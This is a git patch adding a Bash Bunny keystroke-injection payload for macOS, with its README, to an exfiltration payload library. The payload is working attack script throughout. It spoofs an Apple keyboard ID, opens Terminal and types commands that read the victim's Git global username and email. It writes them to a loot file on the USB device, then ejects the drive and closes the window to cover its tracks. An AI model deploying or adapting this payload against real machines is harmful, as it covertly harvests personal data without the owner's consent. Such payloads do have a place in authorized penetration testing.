From 5cfae30936462e81e678ec4f6d83acb6a883e464 Mon Sep 17 00:00:00 2001 From: quentinlamamy Date: Sun, 20 Aug 2023 12:06:24 +0200 Subject: [PATCH] Add github information exfiltration payload --- .../exfiltration/githubExfiltration/README.md | 30 ++++++++++ .../githubExfiltration/payload.txt | 58 +++++++++++++++++++ 2 files changed, 88 insertions(+) create mode 100644 payloads/library/exfiltration/githubExfiltration/README.md create mode 100755 payloads/library/exfiltration/githubExfiltration/payload.txt diff --git a/payloads/library/exfiltration/githubExfiltration/README.md b/payloads/library/exfiltration/githubExfiltration/README.md new file mode 100644 index 00000000..63162238 --- /dev/null +++ b/payloads/library/exfiltration/githubExfiltration/README.md @@ -0,0 +1,30 @@ +
+ +# Github Information Exfiltration +**Get Git user name and email from the Git global config and exfiltrate them** + +![Bash](https://img.shields.io/badge/Shell_Script-121011?style=for-the-badge&logo=gnu-bash&logoColor=white) +![Quack](https://img.shields.io/badge/Ducky_Script-121011?style=for-the-badge&logo=duck&logoColor=white) + +![OSX](https://img.shields.io/badge/OSX-FFFFFF?style=for-the-badge&logo=apple&logoColor=black) + +
+ +banner + +# Dependency + +* OSX Extension by quentin_lamamy + +# Changelog +v1.0 : +* :tada: Release on 2023/08/20 + +# Contributing +A bug ? An idea of feature ? [Fill an issue on github](https://github.com/quentinlamamy/bashbunny/issues) + +# License +

Github Infos Exfiltration Payload by Quentin Lamamy is licensed under CC BY-NC-SA 4.0

+ +# Support +Buy Me A Coffee diff --git a/payloads/library/exfiltration/githubExfiltration/payload.txt b/payloads/library/exfiltration/githubExfiltration/payload.txt new file mode 100755 index 00000000..bce2553e --- /dev/null +++ b/payloads/library/exfiltration/githubExfiltration/payload.txt @@ -0,0 +1,58 @@ +#!/bin/bash +# +# Title: OSX Payload to exfiltrate Git user name and email +# Description: Get Git user name and email from the Git global config and exfiltrate them +# Author: quentin_lamamy +# Version: 1.0 +# Category: Exfiltration +# Attackmodes: HID STORAGE +# Target OS: OSX +# Dependency: OSX Extensions +# +# Magenta solid Setup +# Yellow single blink Attack in progress +# Yellow double blink Sync +# Yellow triple blink Cleanup +# Green blink then solid Finished + +LED SETUP + +ATTACKMODE STORAGE HID VID_0X05AC PID_0X0250 + +OSX TERMINAL OPEN + +Q STRING 'last_mounted_volume=$(ls -t /Volumes | head -n 1)' +Q ENTER +Q STRING 'lootPath=/Volumes/$last_mounted_volume/loot/gitInfos.txt' +Q ENTER +Q STRING 'touch $lootPath' +Q ENTER + +LED ATTACK + +# Get the user name from the Git global config +Q STRING 'user_name=$(git config --global user.name)' +Q ENTER + +# Get the user email from the Git global config +Q STRING 'user_email=$(git config --global user.email)' +Q ENTER + +Q STRING 'echo -e "Username: $user_name\nMail: $user_email" > $lootPath' +Q ENTER + +# Sync +LED STAGE 2 +sync + +# Cleanup +LED STAGE 3 + +# Eject +QUACK STRING 'diskutil eject $last_mounted_volume' +QUACK ENTER +DELAY 100 + +OSX TERMINAL CLOSE + +LED FINISH \ No newline at end of file